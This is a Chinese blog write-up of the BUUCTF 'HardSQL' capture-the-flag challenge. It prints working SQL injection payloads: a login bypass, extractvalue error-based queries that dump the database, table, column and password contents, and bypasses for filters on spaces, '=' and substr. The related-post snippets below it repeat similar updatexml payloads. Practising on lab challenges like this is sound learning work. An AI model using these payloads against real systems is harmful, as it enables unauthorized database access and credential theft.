【BUUCTF】HardSQL

于 2024-09-04 09:30:01 发布
阅读量567 收藏 3
点赞数 3
分类专栏: BUUCTF 文章标签: 数据库 mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74077634/article/details/141884420
版权

题目描述

一道纯粹的SQL注入题

img

尝试进行注入,发现对以下字符进行了过滤:

= %20(空格) %09 %0a %0b %0c %0d /**/ substr union by and

且过滤方式不区分大小写,检测到以上字符就die()

题解

先找注入点,由于空格被过滤,与空格起同样作用的字符也被过滤,因此我们使用()将库名、表名、字段名包裹起来,就不需要使用空格了。
exp 如下:

?username=-1'or(1)%23&password=1

img

成功登录。

由于过滤了union,我们使用报错注入的方式进行尝试。另外,由于=被过滤,我们可以使用like来代替=。payload如下:

//爆库名
1'or(extractvalue(1,concat(0x7e,(database()))))%23
//爆表名
1'or(extractvalue(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())))))%23
//爆字段名
1'or(extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like("H4rDsq1")))))%23
//爆字段值
1'or(extractvalue(1,concat(0x7e,(select(group_concat(password))from(geek.H4rDsq1)))))%23

在爆字段值的时候我们看到,flag只显示了一部分

img

由于substr()函数被过滤,我们使用left()right()来进行字符串的截取,payload:

1'or(extractvalue(1,concat(0x7e,right((select(group_concat(password))from(geek.H4rDsq1)),30))))%23

其中30是截取右边字符的个数,可以改为其他值,只要能拿到完整flag即可。

img

总结

绕过空格

使用以下字符替代空格,可以起到相同效果

%09 %0a %0b %0c %0d /**/

或使用()包裹库名、表名、字段名,从而避免空格的使用,如:

select(group_concat(table_name))from(information_schema.tables)where(table_schema)=(database())

绕过 =

like代替=

字符串显示不全

使用以下三个函数对字符串进行截取:

substr()   left()   right()
不会代码的小徐
关注
专栏目录
BUUCTF——[极客大挑战 2019]HardSQL
doraemon12345的博客
06-01 273
打开题目,进行常规注入,发现都行不通,union、空格和and被过滤了,尝试extractvalue()报错注入可行,开始做题,建议做的时候可以先用burp抓包在里面做,在网页上做请先带好痛苦面具(有耐心的当我没说,嘿嘿)。 先爆库名: payload:?username=1&password=123'^extractvalue(1,concat(0x7e,(select(database()))))%23 得到库名爆表名: payload:?username=1&password=12
BUUCTF
Q221022的博客
02-12 1294
1.old-fashion 直接用quiqiup解密即可得到flag 2.世上无难事 看到答案是32位,我就想到了MD5,然后用MD5解密,不对,不是MD5,所以就用quipqiup试试,key就出来了 3.RSA3 题上有两组c和e,只有一个n,(所以猜测这两组应该用的是同一个n)将n分解成p和q(不知道为什么,我用了三个网站都没分解出来,是因为数字太大吗?)然后,就可以求出私钥d,进而解密出m ,得到答案 4.RSA2 dp=d mod (p-1) 我认为..
[BUUCTF刷题]HardSQL
weixin_43952190的博客
07-03 2101
HardSQL 进入后是sql注入页面,过滤了一些字符,先进行fuzz测试。 发现过滤了union,双写也无法绕过,所以不能使用常规的方法进行注入。但发现没有过滤extractvalue和updatexml。 也过滤了空格,使用括号绕过。 首先,注数据库名称 username=admin'or(updatexml(1,concat(0x7e,(SELECT(database())),0x7e),1))%23&password=1 然后得到表名(过滤=,使用like) userna
buuctf-HardSQL
m0_62094846的博客
04-02 1422
这道题过滤了很多sql注入的关键词(可以用bp,fuzz出来,下次试试) 包括空格,但是没有过滤报错注入的两个关键词updatexml和extractvalue 用报错注入 查库名(geek) ?username=1'or(updatexml(1,concat(0x7e,(database()),0x7e),1))%23&password=1 查找所有数据库 ?username=admin'or(updatexml(1,concat(0x7e,(select(grou...
BUUCTFHardSQL[极客大挑战 2019]
金 帛的博客
06-06 1456
buucft记录贴
BUUCTF WEB HardSql
qq_41696858的博客
10-13 272
这题考的是报错注入 判断注入类型还是跟之前一样的,一个单引号’直接看出来是单引号闭合 下面就是注入方式了,之前的双写,堆叠肯定就不用想了,试试报错,emmm 关于报错注入,可以看这一篇,感觉写的还挺详细的,https://developer.aliyun.com/article/692723 基础payload: 账号:a'^extractvalue(1,concat('~',(select(database()))))#,密码123 成功爆破出来库名geek 空格被过滤了,所以需要空格来绕过 知道注入方
BUUCTF-Web-Mark loves cat变量函数覆盖
02-16
【变量覆盖漏洞详解】 ...这类漏洞通常出现在以下几种情况: 1. **全局变量覆盖**: ...攻击者可以通过操纵这些请求参数来覆盖预定义的变量,造成安全风险。... ...2. **extract()函数使用不当**: `extract()`函数会从数组中...
BUUCTF逆向前八题
01-24
在本篇中,我们将探讨在BUUCTF储备赛中遇到的前八道逆向题目,通过这些题目来学习如何使用逆向工具,如exeinfo和IDA,以及如何解析汇编代码以获取关键信息。 1. Easyre: 这道题首先使用exeinfo查看文件信息,确认...
BUUCTF题目(含工具),你竟然赶我走、乌镇峰会种图、你竟然赶我走、大白、(超级详细)“小白”入坑CTF,先入手杂项部分
04-09
BUUCTF题目(含工具),你竟然赶我走、乌镇峰会种图、你竟然赶我走、大白、(超级详细)“小白”入坑CTF,先入手杂项部分
buuctf-[极客大挑战 2019]HardSQL(小宇特详解)
小宇的web博客
01-26 3165
buuctf-[极客大挑战 2019]HardSQL(小宇特详解) 遇到了SQL注入,先尝试一下万能密码,虽然感觉%100不能用 果不其然 双写再试一下发现也不行 这里使用extractvalue和updatexml进行报错注入,空格和=号没有,所以我们要使用()来代替空格,使用like来代替=号 使用extractvalue() /check.php?username=admin&password=admin'^extractvalue(1,concat(0x7e,(select(database
BUUCTF:[极客大挑战 2019]HardSQL
末初的CSDN博客
11-07 619
题目地址:https://buuoj.cn/challenges#[%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98%202019]HardSQL 使用Burpfuzz测试过滤了哪些关键字 过滤了空格、=、substring、mid等字符 Trick 使用()代替空格 使用like代替= 使用right、left代替substring、mid 注入过程如下 1'or(1)like(2)%23 1'or(updatexml('~',concat('~',
BUUCTF [极客大挑战 2019]HardSQL
m0_63253040的博客
03-28 2410
还是这个熟悉的登录页面 尝试万能密码登录,发现有过滤,一个一个试 过滤了空格,=,等等许多,双写也无法绕过,那么换报错注入试试
BUUCTF----[极客大挑战 2019]HardSQL
woshicainiao666的博客
03-09 588
报错注入updatexml()
BUUCTF---web---[极客大挑战 2019]HardSQL
2201_75556700的博客
05-19 852
7、 太可恶了,只爆出了一半,问题不大,我们使用right()函数,爆出password的 ,一般flag的长度为32位,加上前面爆出了大概有二十来个,继续爆右边大概15个就可以凑完整,不放心的话,可以爆长点。2、使用万能密码发现不可以,这种题前面有很多,这道题用前面的绕过方法不行,得换一种前面没有用过的方法,最近刚学了报错注入,前面就没有用这个方法,这里试试。查阅资料后发现需要构造下面的方法 and用^替换,#用%23替换,空格用()替换。4、用类似的方法查表名:这里注意=用like替换。
BUUCTF [极客大挑战 2019] HardSQL 1
最新发布
m0_74167420的博客
06-18 335
原因:在输入' 或者 # 号时,'会被识别出来过滤掉,#会注释掉后面的内容,因此要进行url编码。在该题目中,双写被过滤掉了,同时空格,=,union也被过滤了。或者, payload为: 用 ^ 符号代替 or。1、阅读题目,是SQL注入的题目类型。2、尝试万能密码和堆叠注入,均被过滤。
CTF-Web-[极客大挑战 2019]HardSQL
归子莫的博客
05-03 2956
CTF-Web-[极客大挑战 2019]HardSQL 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 https://buuoj.cn/challenges 题目 Web类,[极客大挑战 2019]HardSQL 打开题目的实例 思路 SQl的题目,首先试一试...
BUU-web HardSQL
qq_46635165的博客
10-18 328
知识点: sql显错注入 显错注入:简单来说,就是通过某些函数回显的报错信息来获取我们想要的数据; 例如: mysql的 updatexml() 函数:由于 select user() 查询出的数据不符合 XPATH 语法,从而报错,顺便将 select user() 这条语句执行,并将结果以报错的方式显示出来; 解题: 打开解题网址,账户密码登录框,尝试单引号报错,报错成功; 单引号闭合,并 # 号注释:闭合成功; 接下来尝试 order by 字段猜测,发现 被过滤:并且过滤了 union ,a.
【学习笔记 29】 buu [极客大挑战 2019]HardSQL
weixin_43553654的博客
07-28 173
0x00 知识点 sql报错注入 通过left,right来查询不同内容 0x01 知识点详解 什么是报错注入? 答:其原因主要是因为虚拟表的主键重复。按照MySQL的官方说法,group by要进行两次运算,第一次是拿group by后面的字段值到虚拟表中去对比前,首先获取group by后面的值;第二次是假设group by后面的字段的值在虚拟表中不存在,那就需要把它插入到虚拟表中,这里在插入时会进行第二次运算,由于rand函数存在一定的随机性,所以第二次运算的结果可能与第一次运算的结果不一致,但
buuctf wireshark
09-12
根据您提供的引用内容,buuctf wireshark 是一个与buuctf比赛相关的题目。其中,Wireshark 是一个网络封包分析软件,可以用来捕获和分析网络数据包。根据[1]中提供的下载地址,可以下载 Wireshark 软件进行使用。 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值